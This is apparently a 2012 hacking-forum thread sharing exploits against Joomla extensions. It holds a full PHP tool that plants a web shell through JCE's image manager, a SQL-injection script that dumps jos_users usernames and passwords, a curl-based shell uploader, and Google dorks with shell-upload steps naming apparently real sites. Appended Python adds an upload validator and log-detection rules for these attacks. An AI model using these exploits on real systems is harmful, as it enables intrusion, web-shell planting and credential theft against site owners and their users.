Joomla Upload Vulnerabilities

RujAjan
Special Member
Joined: 28 Oct 2012
Messages: 2,486
Reaction score: 1
Points: 0
Joomla JCE 2.0.10 Shell Upload Exploit
Code:
<?php

error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush(1);

echo '<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>

<body bgcolor="#000000">

<p align="center"><font size="4" color="#00ff00">JCE Joomla Extension Remote File Upload</font></p>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
<form name="form1" action="' . htmlspecialchars($_SERVER['PHP_SELF']) . '" enctype="multipart/form-data" method="post">
<p><font color="#00ff00">hostname (ex: www.sitename.com): </font><input name="host" size="20"> <font color="#FF0000">*</font></p>
<p><font color="#00ff00">path (ex: /joomla/ or just /): </font><input name="path" size="20"> <font color="#FF0000">*</font></p>
<p><font color="#00ff00">Please specify a file to upload: </font><input type="file" name="datafile" size="40"> <font color="#FF0000">*</font></p>
<p><font color="#00ff00">specify a port (default is 80): </font><input name="port" size="20"></p>
<p><font color="#00ff00">Proxy (ip:port): </font><input name="proxy" size="20"></p>
<p align="center"><font color="#FF0000">* </font><font color="white">fields are required</font></p>
<p><input type="submit" value="Start" name="Submit"></p>
</form>
</td>
</tr>
</tbody>
</table>
</body></html>';

/* Send one raw HTTP request, directly or through an HTTP proxy.
   $response = 1 reads the reply into $html, $output = 1 echoes it,
   $s = 1 runs the JCE version fingerprint on the reply. */
function sendpacket($packet, $response = 0, $output = 0, $s = 0)
{
    global $proxy, $host, $port, $html;
    if ($proxy == '') {
        $ock = fsockopen($host, $port);
        if (!$ock) {
            echo '<font color=white>No response from ' . htmlentities($host) . ' ...<br></font>';
            die;
        }
        stream_set_timeout($ock, 5);
    } else {
        $parts = explode(':', $proxy);
        echo '<font color=white>Connecting to proxy: ' . htmlentities($parts[0] . ':' . $parts[1]) . ' ...<br><br/></font>';
        $ock = fsockopen($parts[0], $parts[1]);
        if (!$ock) {
            echo '<font color=white>No response from proxy...<br></font>';
            die;
        }
        stream_set_timeout($ock, 5);
    }

    fputs($ock, $packet);
    $html = '';
    if ($response == 1) {
        if ($proxy == '') {
            while (!feof($ock)) {
                $html .= fgets($ock);
            }
        } else {
            /* through a proxy, read byte by byte until EOF or the end of the headers */
            while (!feof($ock) && !preg_match("/\r\n\r\n/", $html)) {
                $html .= fread($ock, 1);
            }
        }
    }

    fclose($ock);
    if ($response == 1 && $output == 1) echo nl2br(htmlentities($html));
    if ($s == 1) {
        /* JCE versions that already carry the fix; any of them in the page <title> means the target is patched */
        $str = array('2.0.11</title', '2.0.12</title', '2.0.13</title', '2.0.14</title', '2.0.15</title',
                     '1.5.7.10</title', '1.5.7.11</title', '1.5.7.12</title', '1.5.7.13</title', '1.5.7.14</title');
        foreach ($str as $value) {
            if (strpos($html, $value) !== false) {
                echo "<font color=white>Target patched.<br/><br/></font>";
                die();
            }
        }
        echo '<font color=white>Target is exploitable.<br/><br/></font>';
    }
}

$host  = $_POST['host'];
$path  = $_POST['path'];
$port  = $_POST['port'];
$proxy = $_POST['proxy'];

if (isset($_POST['Submit']) && $host != '' && $path != '') {

    $port = intval(trim($port));
    if ($port == 0) { $port = 80; }
    if (($path[0] != '/') or ($path[strlen($path) - 1] != '/')) { die('<font color=white>Error... check the path!</font>'); }
    /* through a proxy the request line must carry the absolute URL */
    if ($proxy == '') { $p = $path; } else { $p = 'http://' . $host . ':' . $port . $path; }
    $host = str_replace("\r\n", "", $host);
    $path = str_replace("\r\n", "", $path);

    /* Packet 1 --> Checking Exploitability: fetch the imgmanager plugin page and fingerprint its version */
    $packet  = "GET " . $p . "index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n\r\n";

    sendpacket($packet, 1, 0, 1);

    /* Packet 2 --> Uploading shell as a gif file.
       A GIF89a header is prepended so the file passes the image check;
       the multipart body mimics the image manager's own upload form. */

    $content  = "GIF89a1\n";
    $content .= file_get_contents($_FILES['datafile']['tmp_name']);
    $boundary = "---------------------------41184676334";
    $data  = "--" . $boundary . "\r\n";
    $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
    $data .= "/\r\n";
    $data .= "--" . $boundary . "\r\n";
    $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
    $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
    $data .= "--" . $boundary . "\r\n";
    $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
    $data .= "0\r\n";
    $data .= "--" . $boundary . "\r\n";
    $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n";
    $data .= "Content-Type: image/gif\r\n\r\n";
    $data .= $content . "\r\n";
    $data .= "--" . $boundary . "\r\n";
    $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
    $data .= "upload\r\n";
    $data .= "--" . $boundary . "--\r\n";
    $packet  = "POST " . $p . "index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n";
    $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
    $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F\r\n";
    $packet .= "Connection: Close\r\n";
    $packet .= "Proxy-Connection: close\r\n";
    $packet .= "Content-Length: " . strlen($data) . "\r\n\r\n";
    $packet .= $data;

    sendpacket($packet, 0, 0, 0);

    /* Packet 3 --> Change Extension from .gif to .php through the image manager's JSON folderRename call */

    $packet  = "POST " . $p . "index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
    $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
    $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
    $packet .= "Accept-Encoding: deflate\r\n";
    $packet .= "X-Request: JSON\r\n";
    $packet .= "Cookie: jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
    $packet .= "Connection: Close\r\n";
    $ren = "json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}";
    $packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";
    $packet .= $ren;

    sendpacket($packet, 1, 0, 0);

    /* Packet 4 --> Check for successful upload */

    $packet  = "HEAD " . $p . "images/stories/0day.php HTTP/1.1\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
    $packet .= "Connection: Close\r\n\r\n";

    sendpacket($packet, 1, 0, 0);

    if (stristr($html, '200 OK') === false) {
        echo "<font color=white>Exploit Failed...</font>";
    } else {
        echo "<font color=white>Exploit Succeeded...<br>http://$host:$port$path" . "images/stories/0day.php</font>";
    }
}
?>
Code:
Google dork: "inurl:com_autostand"
--------------------------
localhost/path/index.php?option=com_autostand&func=newItem
--------------------------
localhost/path/images/autostand/images/shell.php
--------------------------
example: http://www.maxoverdrive.ca//index.php?option=com_autostand&func=newItem
Code:
Google dork: "inurl:com_garyscookbook"
--------------------------
localhost/path/index.php?option=com_garyscookbook&func=newItem
--------------------------
localhost/path/components/com_garyscookbook/img_pictures/shell.php
Code:
Google dork: inurl:index.php?option=com_joomla_flash_uploader

http://localhost/index.php?option=com_joomla_flash_uploader&Itemid=[id]

Or

http://localhost/administrator/components/com_joomla_flash_uploader/tfu/tfu_210.swf

Upload Shell.php or shell.php.jpg

For example ==> Upload folder: ./images/stories/ ==> Your shell => http://localhost//images/stories/shell.php

Example: http://www.coachforexcellence.co.uk/index.php?option=com_joomla_flash_uploader&Itemid=98


Joomla Component com_spidercalendar Remote Exploit (SQL injection)
Code:
<?php
/* The original ships the HTML as document.write(unescape(...)) and the PHP as
   eval(base64_decode(...)); both are decoded here so the injection is visible. */
error_reporting(0);
?>
<html>
<head>
<title>Spider Calendar Joomla Exploit</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
body,td,th { color: #FF0000; }
body { background-color: #000000; }
</style>
</head>
<body><br>
<br><center>
<img src="http://a4.sphotos.ak.fbcdn.net/hphotos-ak-ash3/553280_444893268875730_721348140_n.jpg" width="125" height="109" align="middle" longdesc="Poison Security"><br></center>
<div align="center"><br>
  <a href="https://poisonsecurity.wordpress.com">Poison Security</a> <br>
  Joomla Spider Calendar Remote SQL Exploit
 <br><br>
</div>
<form action="?action=exploit" method="post">
<table border=0>
<tr>
<td>Enter the site URL </td>
<td><input type="text" name="url"/></td><td><input type="submit" name="launch"/></td>
</tr>
</table>
Usage: http://127.0.0.1/path/<br>
Possible dork: inurl:com_spidercalendar<br>
<br>
</form>
</body>
</html>
<?php
if (isset($_GET['action']) && $_GET['action'] == 'exploit') {
    /* UNION-based injection in the "date" parameter: the third column is replaced with
       "=====username=password=====" taken from jos_users, so it can be cut out of the page */
    $resultado = file_get_contents($_POST['url'] . "/index.php?option=com_spidercalendar&date=999999.9%27%20union%20all%20select%20null%2Cnull%2Cconcat%280x3D3D3D3D3D,username,0x3D,password,0x3D3D3D3D3D%29%2Cnull%2Cnull%2Cnull%20from%20jos_users+--+%20D4NB4R");
    $partes = explode("=====", $resultado);
    echo $partes[1];
} else {
    echo "Enter a URL";
}
// D4NB4R 2012
/* If you are reading this message, congratulations: it means it is not enough for you to be
   handed the password, you want to know why it gives the password. Simple as that is, it sets
   you apart from many. My friend _84kur10_ and I, D4NB4R, salute you. */
?>
Code:
Joomla Component com_agileplmform file upload vulnerability
Google Dork: inurl:components/com_agileplmform

<?php
/* example of using:
   $uploadfile = 'C:\AppServ\www\Tunisia.php'; */
$uploadfile = 'C:\AppServ\www\b.php';   // local path of the file to upload
$url = "http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/uploadify.php";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
// uploadify.php takes the file in "Filedata" and the destination directory in "folder";
// CURLFile replaces the old "@file" syntax on PHP >= 5.5
$file = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => $file,
    'folder'   => '/components/com_agileplmform/views/agileplmform/js/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);   // the response carries the name of the stored file
curl_close($ch);
print "$postResult";
?>

[+] How to use
Tunisia.php must be the devil file 3:)
!!!shell!!!
TN> http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/
Filename: the $postResult output

Code:
Joomla Component com_ksadvertiser Remote File & Bypass Upload Vulnerability
Google Dork: inurl:index.php?option=com_ksadvertiser

1. Some pages require registration:

http://site/index.php?option=com_user&view=login

2. Go to the upload path:

http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en

3. Go to images and click upload; browse to your file shell.php, renamed to shell.php.gif.

4. Locate your file under the root in /images/ksadvertiser/U0 (this may vary):

http://site/images/ksadvertiser/U0/403.php.gif

Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif

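The three bypasses this thread relies on (a GIF header in front of PHP code so the upload passes as an image, a rename from .gif to .php after the upload, and a double extension such as shell.php.gif) all get past checks that look only at the last extension and the first bytes. The following Python is an added example, not code from the post or from JCE, com_ksadvertiser or the other components named: it models such a weak check next to a stricter one that derives a canonical extension, refuses any executable segment, sniffs for PHP tags as a stand-in for re-encoding the image, and stores under a server-chosen name. The sample bytes (a 1x1 GIF, the same GIF with PHP appended, and the GIF-prefixed PHP payload the JCE exploit uploads as 0day.gif) are constructed.

```python
import hashlib
import re
import struct

IMAGE_EXT = {"gif", "jpg", "jpeg", "png"}
MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n")
# Any of these as a dotted segment anywhere in the name is refused by the strict check.
EXEC_EXT = re.compile(r"^(php\d?|phtml|phar|pl|cgi|py|asp|aspx|jsp)$", re.I)
# Crude stand-in for re-encoding the image: refuse anything that carries a PHP open tag.
PHP_TAG = re.compile(rb"<\?(php|=)?", re.I)

# Constructed sample inputs: a valid 1x1 GIF, the same GIF with PHP appended,
# and the GIF-header-plus-PHP file the JCE exploit uploads as 0day.gif.
VALID_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
POLYGLOT = VALID_GIF + b"<?php echo 1; ?>"
JCE_PAYLOAD = b"GIF89a1\n<?php system($_GET['c']); ?>"


def weak_accept_upload(filename, content):
    """Weak check: last extension is an image type and the first bytes look like an image."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in IMAGE_EXT and content.startswith(MAGIC)


def weak_rename_allowed(old, new):
    """Weak rename: only keeps the new name inside the upload directory; the extension is not re-checked."""
    return ".." not in new and "/" not in new and "\\" not in new


def _canonical_ext(filename):
    """Return the allow-listed final extension, or None if any dotted segment is executable."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or any(EXEC_EXT.match(p) for p in parts[1:]):
        return None
    return parts[-1] if parts[-1] in IMAGE_EXT else None


def _looks_like_image(content):
    if not content.startswith(MAGIC) or PHP_TAG.search(content):
        return False
    if content.startswith(b"GIF"):
        # Logical screen size must be non-zero and the file must end with the GIF trailer ';'.
        if len(content) < 13:
            return False
        w, h = struct.unpack("<HH", content[6:10])
        return w > 0 and h > 0 and content.endswith(b";")
    return True


def strict_store(filename, content):
    """Return the server-chosen name to store under, or None to reject.
    The client never picks the stored name: content hash plus the canonical extension."""
    ext = _canonical_ext(filename)
    if ext is None or not _looks_like_image(content):
        return None
    return hashlib.sha256(content).hexdigest()[:16] + "." + ext


def strict_rename_allowed(old, new):
    """Strict rename: the new name must keep the same allow-listed image extension."""
    return (weak_rename_allowed(old, new)
            and _canonical_ext(new) is not None
            and _canonical_ext(new) == _canonical_ext(old))


if __name__ == "__main__":
    print("weak accepts JCE payload as .gif:", weak_accept_upload("0day.gif", JCE_PAYLOAD))
    print("weak allows .gif -> .php rename:", weak_rename_allowed("0day.gif", "0day.php"))
    print("weak accepts shell.php.gif:", weak_accept_upload("shell.php.gif", VALID_GIF))
    print("strict stores JCE payload as:", strict_store("0day.gif", JCE_PAYLOAD))
    print("strict stores shell.php.gif as:", strict_store("shell.php.gif", VALID_GIF))
    print("strict stores photo.gif as:", strict_store("photo.gif", VALID_GIF))
    print("strict allows .gif -> .php rename:", strict_rename_allowed("0day.gif", "0day.php"))
```

The double extension matters because Apache's mod_mime examines every dotted segment when PHP is mapped with AddHandler, so shell.php.gif is handed to the PHP handler; the strict store rejects the name before the web server ever sees it. The PHP_TAG scan is only a stopgap: a real uploader should re-encode the image with an imaging library, which strips any appended payload regardless of how it is tagged.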
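On the detection side, as an added example that is not from the post or from the Joomla extensions it names: rules for the request patterns in this thread (the JCE imgmanager probe and upload followed by a check of images/stories/<name>.php, the POST to com_agileplmform's uploadify.php, direct fetches of the flash uploader's SWF, and double-extension or PHP paths under upload directories) run over Apache combined-format access log lines. The log lines are constructed, and the rule names, the 300-second correlation window and the path patterns are this example's assumptions.

```python
import re
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
JCE_RX = re.compile(r"option=com_jce.*plugin=imgmanager", re.I)

# Single-request rules: (name, method filter or None, path regex).
RULES = [
    # the imgmanager plugin reached directly; also hit by legitimate editor users, so low confidence
    ("jce-imgmanager", None, JCE_RX),
    # com_agileplmform ships an unauthenticated uploadify.php
    ("agileplmform-uploadify", "POST", re.compile(r"/com_agileplmform/.*/uploadify\.php", re.I)),
    # the flash uploader's SWF fetched straight from administrator/
    ("flash-uploader-swf", None, re.compile(r"/com_joomla_flash_uploader/tfu/tfu_\d+\.swf", re.I)),
    # double extension such as shell.php.gif, or PHP requested from an image/upload directory
    ("double-extension", None, re.compile(r"\.(php\d?|phtml)\.(gif|jpe?g|png)(\?|$)", re.I)),
    ("php-in-upload-dir", None, re.compile(r"/(images|img_pictures)/.*\.(php\d?|phtml)(\?|$)", re.I)),
]
CHAIN_WINDOW = timedelta(seconds=300)   # assumption: upload and probe land within five minutes

# Constructed sample log (combined format), mirroring the requests the exploits above send.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Nov/2012:14:03:11 +0000] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 5123 "-" "BOT/0.1 (BOT for JCE)"
203.0.113.7 - - [05/Nov/2012:14:03:12 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.1" 200 812 "-" "BOT/0.1 (BOT for JCE)"
203.0.113.7 - - [05/Nov/2012:14:03:13 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 97 "-" "BOT/0.1 (BOT for JCE)"
203.0.113.7 - - [05/Nov/2012:14:03:14 +0000] "HEAD /images/stories/0day.php HTTP/1.1" 200 - "-" "BOT/0.1 (BOT for JCE)"
198.51.100.9 - - [05/Nov/2012:14:10:02 +0000] "POST /components/com_agileplmform/views/agileplmform/js/uploadify.php HTTP/1.1" 200 14 "-" "curl/7.21.0"
198.51.100.9 - - [05/Nov/2012:14:12:40 +0000] "GET /images/ksadvertiser/U0/403.php.gif HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
192.0.2.44 - - [05/Nov/2012:14:15:00 +0000] "GET /images/stories/logo.png HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect(lines):
    """Return a list of (ip, rule, path) findings, in log order."""
    findings = []
    last_imgmanager_post = {}   # ip -> time of the last POST to the imgmanager plugin
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, method, rx in RULES:
            if (method is None or rec["method"] == method) and rx.search(rec["path"]):
                findings.append((rec["ip"], name, rec["path"]))
        if rec["method"] == "POST" and JCE_RX.search(rec["path"]):
            last_imgmanager_post[rec["ip"]] = rec["time"]
        # The JCE chain ends with a probe of images/stories/<name>.php; tie it to a recent upload POST.
        if re.search(r"/images/stories/[^/]+\.php", rec["path"], re.I):
            t = last_imgmanager_post.get(rec["ip"])
            if t is not None and timedelta(0) <= rec["time"] - t <= CHAIN_WINDOW:
                findings.append((rec["ip"], "jce-upload-chain", rec["path"]))
    return findings


if __name__ == "__main__":
    for ip, rule, path in detect(SAMPLE_LOG.splitlines()):
        print(f"{ip:15} {rule:24} {path}")
```

The imgmanager rule alone also fires for admins using the editor, so treat it as context; the chain rule (a POST to the imgmanager plugin followed by a request for images/stories/<name>.php from the same address inside the window) and the double-extension rule are the ones worth alerting on. The rename step itself is not visible in the access log because it travels in the POST body, which is why the probe of the renamed file is used as the anchor.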

CyberNova
New Member
Joined: 23 Sep 2012
Messages: 92
Reaction score: 0
Points: 0
Cheers, thank you.
 

Copyright® Ajanlar.org 2012